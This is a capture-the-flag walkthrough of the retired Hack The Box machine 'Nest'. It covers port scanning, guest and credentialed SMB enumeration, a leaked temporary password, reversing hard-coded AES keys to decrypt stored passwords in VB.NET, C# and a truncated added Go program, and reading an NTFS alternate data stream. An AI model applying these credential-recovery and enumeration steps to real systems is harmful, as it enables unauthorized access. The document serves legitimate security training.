This post documents the complete walkthrough of Nest, a retired vulnerable VM created by VbScrub, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

Background

Nest is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.178 --rate=700

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-28 08:39:18 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 4386/tcp on 10.10.10.178
Discovered open port 445/tcp on 10.10.10.178

4386/tcp looks interesting. I wonder what it is. Let’s do one better and have nmap scan the discovered ports to establish their services.

# nmap -n -v -Pn -p445,4386 -A --reason 10.10.10.178 -oN nmap.txt
...
PORT     STATE SERVICE       REASON          VERSION
445/tcp  open  microsoft-ds? syn-ack ttl 127
4386/tcp open  unknown       syn-ack ttl 127
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     Reporting Service V1.2
|     Unrecognised command
|   Help:
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.80%I=7%D=1/28%Time=5E2FF41E%P=x86_64-pc-linux-gnu%r(NU
SF:LL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLin
SF:es,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise
SF:d\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x2
SF:0V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comma
SF:nd\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repo
SF:rting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"
SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\
SF:x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20th
SF:e\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---
SF:\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\
SF:nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\r
SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServerCooki
SF:e,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionR
SF:eq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,2
SF:1,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,
SF:"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A
SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20
SF:command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.
SF:2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2
SF:\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r
SF:\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20R
SF:eporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x2
SF:0Reporting\x20Service\x20V1\.2\r\n\r\n>");

Interesting stuff going on at 4386/tcp, but I still don’t know what service that is. Well, since SMB is available, let’s see if there are any file shares worth exploring, using smbmap.

# smbmap -H 10.10.10.178 -u guest -R
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445        Name: 10.10.10.178
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        .
        dr--r--r--                0 Wed Aug  7 22:53:46 2019    .
        dr--r--r--                0 Wed Aug  7 22:53:46 2019    ..
        dr--r--r--                0 Wed Aug  7 22:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 21:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 21:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 19:07:51 2019    Shared
        Data                                                    READ ONLY
        .\
        dr--r--r--                0 Wed Aug  7 22:53:46 2019    .
        dr--r--r--                0 Wed Aug  7 22:53:46 2019    ..
        dr--r--r--                0 Wed Aug  7 22:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 21:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 21:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 19:07:51 2019    Shared
        .\Shared\
        dr--r--r--                0 Wed Aug  7 19:07:51 2019    .
        dr--r--r--                0 Wed Aug  7 19:07:51 2019    ..
        dr--r--r--                0 Wed Aug  7 19:07:33 2019    Maintenance
        dr--r--r--                0 Wed Aug  7 19:08:07 2019    Templates
        .\Shared\Maintenance\
        dr--r--r--                0 Wed Aug  7 19:07:33 2019    .
        dr--r--r--                0 Wed Aug  7 19:07:33 2019    ..
        -r--r--r--               48 Wed Aug  7 19:07:32 2019    Maintenance Alerts.txt
        .\Shared\Templates\
        dr--r--r--                0 Wed Aug  7 19:08:07 2019    .
        dr--r--r--                0 Wed Aug  7 19:08:07 2019    ..
        dr--r--r--                0 Wed Aug  7 19:08:10 2019    HR
        dr--r--r--                0 Wed Aug  7 19:08:07 2019    Marketing
        .\Shared\Templates\HR\
        dr--r--r--                0 Wed Aug  7 19:08:10 2019    .
        dr--r--r--                0 Wed Aug  7 19:08:10 2019    ..
        -r--r--r--              425 Wed Aug  7 22:55:36 2019    Welcome Email.txt
        IPC$                                                    NO ACCESS       Remote IPC
        Secure$                                                 NO ACCESS
        .
        dr--r--r--                0 Sat Jan 25 23:04:21 2020    .
        dr--r--r--                0 Sat Jan 25 23:04:21 2020    ..
        dr--r--r--                0 Fri Aug  9 15:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 07:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 17:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 17:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 22:56:02 2019    TempUser
        Users                                                   READ ONLY
        .\
        dr--r--r--                0 Sat Jan 25 23:04:21 2020    .
        dr--r--r--                0 Sat Jan 25 23:04:21 2020    ..
        dr--r--r--                0 Fri Aug  9 15:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 07:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 17:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 17:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 22:56:02 2019    TempUser

Let’s check out Maintenance Alerts.txt and Welcome Email.txt like so.

# smbclient -Uguest% //10.10.10.178/Data

Enter the respective folders to grab the files. The first one:

Maintenance Alerts.txt
There is currently no scheduled maintenance work

And the next one:

Welcome Email.txt
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you
HR

Looks like we have ourselves the first pair of credentials (TempUser:welcome2019)! Time to dig deeper into SMB…

# smbmap -H 10.10.10.178 -u TempUser -p welcome2019 -R
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.178...
[+] IP: 10.10.10.178:445        Name: 10.10.10.178
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        .
        dr--r--r--                0 Wed Aug  7 22:53:46 2019    .
        dr--r--r--                0 Wed Aug  7 22:53:46 2019    ..
        dr--r--r--                0 Wed Aug  7 22:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 21:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 21:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 19:07:51 2019    Shared
        Data                                                    READ ONLY
        .\
        dr--r--r--                0 Wed Aug  7 22:53:46 2019    .
        dr--r--r--                0 Wed Aug  7 22:53:46 2019    ..
        dr--r--r--                0 Wed Aug  7 22:58:07 2019    IT
        dr--r--r--                0 Mon Aug  5 21:53:41 2019    Production
        dr--r--r--                0 Mon Aug  5 21:53:50 2019    Reports
        dr--r--r--                0 Wed Aug  7 19:07:51 2019    Shared
        .\IT\
        dr--r--r--                0 Wed Aug  7 22:58:07 2019    .
        dr--r--r--                0 Wed Aug  7 22:58:07 2019    ..
        dr--r--r--                0 Wed Aug  7 22:58:07 2019    Archive
        dr--r--r--                0 Wed Aug  7 22:59:34 2019    Configs
        dr--r--r--                0 Wed Aug  7 22:08:30 2019    Installs
        dr--r--r--                0 Sun Jan 26 00:09:13 2020    Reports
        dr--r--r--                0 Mon Aug  5 22:33:51 2019    Tools
        .\IT\Configs\
        dr--r--r--                0 Wed Aug  7 22:59:34 2019    .
        dr--r--r--                0 Wed Aug  7 22:59:34 2019    ..
        dr--r--r--                0 Wed Aug  7 19:20:13 2019    Adobe
        dr--r--r--                0 Tue Aug  6 11:16:34 2019    Atlas
        dr--r--r--                0 Tue Aug  6 13:27:08 2019    DLink
        dr--r--r--                0 Wed Aug  7 19:23:26 2019    Microsoft
        dr--r--r--                0 Wed Aug  7 19:33:54 2019    NotepadPlusPlus
        dr--r--r--                0 Wed Aug  7 20:01:13 2019    RU Scanner
        dr--r--r--                0 Tue Aug  6 13:27:09 2019    Server Manager
        .\IT\Configs\Adobe\
        dr--r--r--                0 Wed Aug  7 19:20:13 2019    .
        dr--r--r--                0 Wed Aug  7 19:20:13 2019    ..
        -r--r--r--              246 Wed Aug  7 19:20:13 2019    editing.xml
        -r--r--r--                0 Wed Aug  7 19:20:09 2019    Options.txt
        -r--r--r--              258 Wed Aug  7 19:20:09 2019    projects.xml
        -r--r--r--             1274 Wed Aug  7 19:20:09 2019    settings.xml
        .\IT\Configs\Atlas\
        dr--r--r--                0 Tue Aug  6 11:16:34 2019    .
        dr--r--r--                0 Tue Aug  6 11:16:34 2019    ..
        -r--r--r--             1369 Tue Aug  6 11:18:38 2019    Temp.XML
        .\IT\Configs\Microsoft\
        dr--r--r--                0 Wed Aug  7 19:23:26 2019    .
        dr--r--r--                0 Wed Aug  7 19:23:26 2019    ..
        -r--r--r--             4598 Wed Aug  7 19:23:26 2019    Options.xml
        .\IT\Configs\NotepadPlusPlus\
        dr--r--r--                0 Wed Aug  7 19:33:54 2019    .
        dr--r--r--                0 Wed Aug  7 19:33:54 2019    ..
        -r--r--r--             6451 Wed Aug  7 23:01:25 2019    config.xml
        -r--r--r--             2108 Wed Aug  7 23:00:36 2019    shortcuts.xml
        .\IT\Configs\RU Scanner\
        dr--r--r--                0 Wed Aug  7 20:01:13 2019    .
        dr--r--r--                0 Wed Aug  7 20:01:13 2019    ..
        -r--r--r--              270 Thu Aug  8 19:49:37 2019    RU_config.xml
        .\Shared\
        dr--r--r--                0 Wed Aug  7 19:07:51 2019    .
        dr--r--r--                0 Wed Aug  7 19:07:51 2019    ..
        dr--r--r--                0 Wed Aug  7 19:07:33 2019    Maintenance
        dr--r--r--                0 Wed Aug  7 19:08:07 2019    Templates
        .\Shared\Maintenance\
        dr--r--r--                0 Wed Aug  7 19:07:33 2019    .
        dr--r--r--                0 Wed Aug  7 19:07:33 2019    ..
        -r--r--r--               48 Wed Aug  7 19:07:32 2019    Maintenance Alerts.txt
        .\Shared\Templates\
        dr--r--r--                0 Wed Aug  7 19:08:07 2019    .
        dr--r--r--                0 Wed Aug  7 19:08:07 2019    ..
        dr--r--r--                0 Wed Aug  7 19:08:10 2019    HR
        dr--r--r--                0 Wed Aug  7 19:08:07 2019    Marketing
        .\Shared\Templates\HR\
        dr--r--r--                0 Wed Aug  7 19:08:10 2019    .
        dr--r--r--                0 Wed Aug  7 19:08:10 2019    ..
        -r--r--r--              425 Wed Aug  7 22:55:36 2019    Welcome Email.txt
        IPC$                                                    NO ACCESS       Remote IPC
        .
        dr--r--r--                0 Wed Aug  7 23:08:12 2019    .
        dr--r--r--                0 Wed Aug  7 23:08:12 2019    ..
        dr--r--r--                0 Wed Aug  7 19:40:25 2019    Finance
        dr--r--r--                0 Wed Aug  7 23:08:12 2019    HR
        dr--r--r--                0 Thu Aug  8 10:59:25 2019    IT
        Secure$                                                 READ ONLY
        .\
        dr--r--r--                0 Wed Aug  7 23:08:12 2019    .
        dr--r--r--                0 Wed Aug  7 23:08:12 2019    ..
        dr--r--r--                0 Wed Aug  7 19:40:25 2019    Finance
        dr--r--r--                0 Wed Aug  7 23:08:12 2019    HR
        dr--r--r--                0 Thu Aug  8 10:59:25 2019    IT
        .
        dr--r--r--                0 Sat Jan 25 23:04:21 2020    .
        dr--r--r--                0 Sat Jan 25 23:04:21 2020    ..
        dr--r--r--                0 Fri Aug  9 15:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 07:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 17:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 17:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 22:56:02 2019    TempUser
        Users                                                   READ ONLY
        .\
        dr--r--r--                0 Sat Jan 25 23:04:21 2020    .
        dr--r--r--                0 Sat Jan 25 23:04:21 2020    ..
        dr--r--r--                0 Fri Aug  9 15:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 07:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 17:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 17:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 22:56:02 2019    TempUser
        .\TempUser\
        dr--r--r--                0 Wed Aug  7 22:56:02 2019    .
        dr--r--r--                0 Wed Aug  7 22:56:02 2019    ..
        -r--r--r--                0 Wed Aug  7 22:56:02 2019    New Text Document.txt

Indeed. The new credentials opened the door to more readable files. Who knows what we can find in the configuration files?

RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>

We have a base64-encoded encrypted password. We also have this history of files recently opened in Notepad++.

config.xml
...
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
        <File filename="C:\windows\System32\drivers\etc\hosts" />
        <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
        <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>

What do we have when we navigate to //10.10.10.178/Secure$/IT/Carl?

Decrypting that “password” in RU_config.xml

Opening Module1.vb gives us the first clue.

Module1.vb
Module Module1

    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}



    End Sub

End Module

Using .NET Fiddle, I was able to decrypt the password with the following Visual Basic code.

Imports System
Imports System.Text
Imports System.Security.Cryptography

Public Module Module1

    Public Class Utils

        Public Shared Function GetLogFilePath() As String
            Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
        End Function

        ' Passphrase, salt, iteration count and IV are hard-coded in the binary,
        ' so anyone who can read the executable can reverse the "encryption".
        Public Shared Function DecryptString(EncryptedString As String) As String
            If String.IsNullOrEmpty(EncryptedString) Then
                Return String.Empty
            Else
                Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
            End If
        End Function

        Public Shared Function EncryptString(PlainString As String) As String
            If String.IsNullOrEmpty(PlainString) Then
                Return String.Empty
            Else
                Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
            End If
        End Function

        ' AES-CBC with a key derived by PBKDF2 (Rfc2898DeriveBytes, HMAC-SHA1);
        ' the IV is the ASCII bytes of initVector, not a random value.
        Public Shared Function Encrypt(ByVal plainText As String, _
                                       ByVal passPhrase As String, _
                                       ByVal saltValue As String, _
                                       ByVal passwordIterations As Integer, _
                                       ByVal initVector As String, _
                                       ByVal keySize As Integer) _
                               As String

            Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
            Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
            Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)
            Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                                   saltValueBytes, _
                                                   passwordIterations)
            Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8))
            Dim symmetricKey As New AesCryptoServiceProvider
            symmetricKey.Mode = CipherMode.CBC
            Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes)
            Using memoryStream As New IO.MemoryStream()
                Using cryptoStream As New CryptoStream(memoryStream, _
                                                       encryptor, _
                                                       CryptoStreamMode.Write)
                    cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length)
                    cryptoStream.FlushFinalBlock()
                    Dim cipherTextBytes As Byte() = memoryStream.ToArray()
                    memoryStream.Close()
                    cryptoStream.Close()
                    Return Convert.ToBase64String(cipherTextBytes)
                End Using
            End Using
        End Function

        ' Exact inverse of Encrypt: same PBKDF2 key, same fixed IV, CBC decrypt,
        ' PKCS7 padding removed by the CryptoStream.
        Public Shared Function Decrypt(ByVal cipherText As String, _
                                       ByVal passPhrase As String, _
                                       ByVal saltValue As String, _
                                       ByVal passwordIterations As Integer, _
                                       ByVal initVector As String, _
                                       ByVal keySize As Integer) _
                               As String

            Dim initVectorBytes As Byte()
            initVectorBytes = Encoding.ASCII.GetBytes(initVector)

            Dim saltValueBytes As Byte()
            saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

            Dim cipherTextBytes As Byte()
            cipherTextBytes = Convert.FromBase64String(cipherText)

            Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                                   saltValueBytes, _
                                                   passwordIterations)

            Dim keyBytes As Byte()
            keyBytes = password.GetBytes(CInt(keySize / 8))

            Dim symmetricKey As New AesCryptoServiceProvider
            symmetricKey.Mode = CipherMode.CBC

            Dim decryptor As ICryptoTransform
            decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

            Dim memoryStream As IO.MemoryStream
            memoryStream = New IO.MemoryStream(cipherTextBytes)

            Dim cryptoStream As CryptoStream
            cryptoStream = New CryptoStream(memoryStream, _
                                            decryptor, _
                                            CryptoStreamMode.Read)

            Dim plainTextBytes As Byte()
            ReDim plainTextBytes(cipherTextBytes.Length)

            Dim decryptedByteCount As Integer
            decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                                   0, _
                                                   plainTextBytes.Length)

            memoryStream.Close()
            cryptoStream.Close()

            Dim plainText As String
            plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                                 0, _
                                                 decryptedByteCount)

            Return plainText
        End Function

    End Class

    ' Feed the value from RU_config.xml straight into the program's own routine.
    Public Sub Main()
        Dim password = Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")
        Console.WriteLine(password)
    End Sub

End Module

The password is xRxRxPANCAK3SxRxRx.

Getting user.txt

Indeed, with c.smith’s password we have access to more files, including user.txt.

Users                                                   READ ONLY
        .\
        dr--r--r--                0 Wed Jan 29 02:00:30 2020    .
        dr--r--r--                0 Wed Jan 29 02:00:30 2020    ..
        dr--r--r--                0 Fri Aug  9 15:08:23 2019    Administrator
        dr--r--r--                0 Sun Jan 26 07:21:44 2020    C.Smith
        dr--r--r--                0 Thu Aug  8 17:03:29 2019    L.Frost
        dr--r--r--                0 Thu Aug  8 17:02:56 2019    R.Thompson
        dr--r--r--                0 Wed Aug  7 22:56:02 2019    TempUser
        .\C.Smith\
        dr--r--r--                0 Sun Jan 26 07:21:44 2020    .
        dr--r--r--                0 Sun Jan 26 07:21:44 2020    ..
        dr--r--r--                0 Thu Aug  8 23:06:17 2019    HQK Reporting
        -r--r--r--               32 Sun Jan 26 07:21:44 2020    user.txt
        .\C.Smith\HQK Reporting\
        dr--r--r--                0 Thu Aug  8 23:06:17 2019    .
        dr--r--r--                0 Thu Aug  8 23:06:17 2019    ..
        dr--r--r--                0 Fri Aug  9 12:18:42 2019    AD Integration Module
        -r--r--r--                0 Thu Aug  8 23:08:16 2019    Debug Mode Password.txt
        -r--r--r--              249 Thu Aug  8 23:09:05 2019    HQK_Config_Backup.xml
        .\C.Smith\HQK Reporting\AD Integration Module\
        dr--r--r--                0 Fri Aug  9 12:18:42 2019    .
        dr--r--r--                0 Fri Aug  9 12:18:42 2019    ..
        -r--r--r--            17408 Wed Aug  7 23:42:49 2019    HqkLdap.exe

Privilege Escalation

All that’s left is the unknown service at 4386/tcp. I was able to connect to the service alright.

One thing to note: enable CRLF as the newline, because, well, Microsoft Windows :wink:. What struck me about the service was the option to enable a debug mode with additional commands.

Besides user.txt, we also have “Debug Mode Password.txt” above. But it has a size of zero, I hear you say. Enter the allinfo command in smbclient.

Alternate Data Stream

When you see a file with a size of zero but you know something interesting is going on with it, chances are the interesting data is stored in an NTFS alternate data stream (ADS), which a normal directory listing does not report.

What do we have here? A data stream of 15 bytes? Let’s grab that!

I think we have the DEBUG password.

Indeed.

It didn’t take me long to discover another encrypted password.

Decrypting that “password” in Ldap.conf

Earlier on I had a look at HqkLdap.exe. It’s a .NET executable.

Using dnSpy, one can easily decompile a .NET executable back into readable C#.

Similarly, we can decrypt the password in .NET Fiddle with the following code.

using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

namespace HqkLdap
{
	// Token: 0x02000007 RID: 7
	public class CR
	{
		// Token: 0x06000012 RID: 18 RVA: 0x00002278 File Offset: 0x00000678
		public static string DS(string EncryptedString)
		{
			if (string.IsNullOrEmpty(EncryptedString))
			{
				return string.Empty;
			}
			return CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
		}

		// Token: 0x06000013 RID: 19 RVA: 0x000022B0 File Offset: 0x000006B0
		public static string ES(string PlainString)
		{
			if (string.IsNullOrEmpty(PlainString))
			{
				return string.Empty;
			}
			return CR.RE(PlainString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
		}

		// Token: 0x06000014 RID: 20 RVA: 0x000022E8 File Offset: 0x000006E8
		private static string RE(string plainText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
		{
			byte[] bytes = Encoding.ASCII.GetBytes(initVector);
			byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
			byte[] bytes3 = Encoding.ASCII.GetBytes(plainText);
			Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations);
			byte[] bytes4 = rfc2898DeriveBytes.GetBytes(checked((int)Math.Round((double)keySize / 8.0)));
			ICryptoTransform transform = new AesCryptoServiceProvider
			{
				Mode = CipherMode.CBC
			}.CreateEncryptor(bytes4, bytes);
			string result;
			using (MemoryStream memoryStream = new MemoryStream())
			{
				using (CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Write))
				{
					cryptoStream.Write(bytes3, 0, bytes3.Length);
					cryptoStream.FlushFinalBlock();
					byte[] inArray = memoryStream.ToArray();
					memoryStream.Close();
					cryptoStream.Close();
					result = Convert.ToBase64String(inArray);
				}
			}
			return result;
		}

		// Token: 0x06000015 RID: 21 RVA: 0x000023DC File Offset: 0x000007DC
		private static string RD(string cipherText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
		{
			byte[] bytes = Encoding.ASCII.GetBytes(initVector);
			byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
			byte[] array = Convert.FromBase64String(cipherText);
			Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations);
			checked
			{
				byte[] bytes3 = rfc2898DeriveBytes.GetBytes((int)Math.Round((double)keySize / 8.0));
				ICryptoTransform transform = new AesCryptoServiceProvider
				{
					Mode = CipherMode.CBC
				}.CreateDecryptor(bytes3, bytes);
				MemoryStream memoryStream = new MemoryStream(array);
				CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Read);
				byte[] array2 = new byte[array.Length + 1];
				int count = cryptoStream.Read(array2, 0, array2.Length);
				memoryStream.Close();
				cryptoStream.Close();
				return Encoding.ASCII.GetString(array2, 0, count);
			}
		}

		// Token: 0x04000006 RID: 6
		private const string K = "667912";

		// Token: 0x04000007 RID: 7
		private const string I = "1L1SA61493DRV53Z";

		// Token: 0x04000008 RID: 8
		private const string SA = "1313Rf99";
	}

	public class Program
	{
		public static void Main()
		{
			Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));
		}
	}
}
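Both Utils.vb (RU Scanner) and the decompiled CR class in HqkLdap.exe use the same construction: a key derived with Rfc2898DeriveBytes (PBKDF2-HMAC-SHA1) from a hard-coded passphrase and salt, and AES-256-CBC with the ASCII bytes of a hard-coded string as the IV. The following Go program is an added example, not code from the post or from the Nest VM's own programs; it re-implements that routine with the standard library so either stored value can be checked without a .NET toolchain, and it parses the RU_config.xml shown earlier as realistic input. The names KdfParams, RUScannerParams, HqkLdapParams, pbkdf2SHA1, DecryptLegacySecret and DecryptConfig are my own; the parameter values are the ones visible in the two source listings above.

```go
package main

// Added example: Go re-implementation of the Utils.Decrypt / CR.RD routine
// from the post (not the VM's own code). Function and type names are mine.

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/base64"
	"encoding/xml"
	"errors"
	"fmt"
)

// KdfParams mirrors the positional arguments of Utils.Decrypt / CR.RD:
// passPhrase, saltValue, passwordIterations, initVector, keySize (bits).
type KdfParams struct {
	PassPhrase string
	Salt       string
	Iterations int
	InitVector string
	KeySize    int
}

// Parameter sets hard-coded in the two binaries found on the shares.
var (
	RUScannerParams = KdfParams{"N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256}
	HqkLdapParams   = KdfParams{"667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256}
)

// ConfigFile matches the RU_config.xml layout shown in the post.
type ConfigFile struct {
	XMLName  xml.Name `xml:"ConfigFile"`
	Port     int      `xml:"Port"`
	Username string   `xml:"Username"`
	Password string   `xml:"Password"`
}

// pbkdf2SHA1 is PBKDF2 (RFC 2898) with HMAC-SHA1, written out so the work
// Rfc2898DeriveBytes does is visible: T_i = U_1 xor ... xor U_iter.
func pbkdf2SHA1(password, salt []byte, iter, keyLen int) []byte {
	var out []byte
	mac := hmac.New(sha1.New, password)
	for block := 1; len(out) < keyLen; block++ {
		mac.Reset()
		mac.Write(salt)
		mac.Write([]byte{byte(block >> 24), byte(block >> 16), byte(block >> 8), byte(block)})
		u := mac.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iter; i++ {
			mac.Reset()
			mac.Write(u)
			u = mac.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// DecryptLegacySecret reverses Utils.Decrypt / CR.RD for one base64 value.
// A wrong parameter set normally shows up as a PKCS7 padding error, which is
// also how .NET's CryptoStream would fail, rather than as silent garbage.
func DecryptLegacySecret(b64 string, p KdfParams) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	key := pbkdf2SHA1([]byte(p.PassPhrase), []byte(p.Salt), p.Iterations, p.KeySize/8)
	blk, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	iv := []byte(p.InitVector) // fixed ASCII IV, exactly as the .NET code does it
	if len(iv) != blk.BlockSize() {
		return "", errors.New("initVector must be exactly one AES block (16 ASCII bytes)")
	}
	if len(ct) == 0 || len(ct)%blk.BlockSize() != 0 {
		return "", errors.New("ciphertext is not a whole number of AES blocks")
	}
	pt := make([]byte, len(ct))
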